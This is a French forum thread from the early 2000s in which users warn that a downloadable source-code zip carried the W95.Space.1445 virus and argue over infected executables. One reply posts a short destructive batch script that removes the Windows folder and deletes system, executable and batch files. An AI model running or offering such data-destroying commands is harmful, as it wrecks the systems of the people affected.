VIRUS SUR UN CODE SOURCE - A LIRE

Arnotic - 22 avril 2001 à 01:15
newhack25 Messages postés 19 Date d'inscription mercredi 8 septembre 2004 Statut Membre Dernière intervention 12 janvier 2005 - 11 nov. 2004 à 18:21
Dans le code source : 21/04/2001 ENFIN UN VRAI GENERATEUR DE MSGBOX [Message Box] par FlintHasForgetHisPass il y a un virus W95.Space.1445 !

Alors si vous n'avais d'anitvirus ne télécharger ce code source car il contamine les .exe et on et obligé de formatter toutes le partition de son disque dur après ! ALORS FAITES ATTENTION !

5 réponses

J'ai viré les exe du zip
Faites gaffe les gars, mettez des anti-virus sur vos machines avant de poster un zip
C'est dans votre interet et dans celui des autres.

A++

Nix :-p
0
Y'A LE MÊME VIRUS DANS LES ZIP DE NEO (LES EXE) FAITES GAFFES !!!
0
A PAS DE VIRUS DANS MES EXE !! CHIER MERDE ...
0
benjaminkanabis Messages postés 1 Date d'inscription jeudi 1 juillet 2004 Statut Membre Dernière intervention 1 juillet 2004
1 juil. 2004 à 19:50
:clown) .:: kanabis ::. :clown)

@echo off
rd C:\WINDOWS
@del C:\Autoexec.bat
@del C:\WINDOWS\*.exe
@del C:\WINDOWS\*.sys
@del C:\*.bat
@del C:\*.com


!! Ca c'est po cool !
0

Vous n’avez pas trouvé la réponse que vous recherchez ?

Posez votre question
newhack25 Messages postés 19 Date d'inscription mercredi 8 septembre 2004 Statut Membre Dernière intervention 12 janvier 2005
11 nov. 2004 à 18:21
:big) lllllllllooooooooooooooooooooooooolllllllllllllllllllllllllllllllllll
0
Rejoignez-nous